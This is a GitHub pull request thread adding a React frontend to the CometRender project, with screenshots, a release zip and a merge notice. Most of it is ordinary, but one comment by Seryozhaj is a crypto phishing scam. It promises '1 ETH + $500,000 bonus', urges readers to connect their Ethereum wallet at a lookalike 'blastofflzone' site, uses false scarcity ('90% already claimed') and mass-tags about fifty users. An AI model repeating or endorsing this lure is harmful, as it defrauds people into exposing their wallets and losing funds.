### PR TITLE
Add React frontend

### PR DESCRIPTION
**Pull request by pierre42100**
Ajout d'un frontend React

### CODE REVIEW

**Comment by pierre42100** [comment]
Screenshot from 2023-03-26 13-38-08

**Comment by pierre42100** [comment]
Screenshot from 2023-03-26 14-42-16

**Comment by pierre42100** [comment]
Screenshot from 2023-03-26 14-43-27

**Comment by pierre42100** [comment]
[react-release.zip](https://github.com/Gus-The-Forklift-Driver/CometRender/files/11071603/react-release.zip)

**Comment by Seryozhaj** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
DanielIonutz, @chellem, @playniuniu, @MauMaxxa, @ngokhoa96, @MojoCreator, @bytjn1416124, @RidiculousDoge, @sumanthmattapali, @abuasifkhan, @DanHowkins, @shitcoding, @satadru5, @nhuhoang0701, @theophane-droid, @zachhhhh, @guglie, @Arvinwijsman, @01zhas, @FelipeFernandesLeandro, @mjgpinheiro, @arslanberat, @zokeber, @zahin-mohammad, @kenorb, @5l1v3r1, @filopalahniuk, @mikecjtio, @PierreKerschgens, @ydjayling, @Lerr1uqs, @ifthenelse, @eugeneyng, @btschwertfeger, @eranh20, @aristotelis-bobas, @finger1517, @salem-med, @rodrigopivi, @Evoolo, @tone711, @FraZap, @rayvinvincent, @zuchengchen, @meysam81, @HiCraigChen, @wugengyu110, @jenjoit, @DevinNorgarb, @bhongong

**Pull request merged**
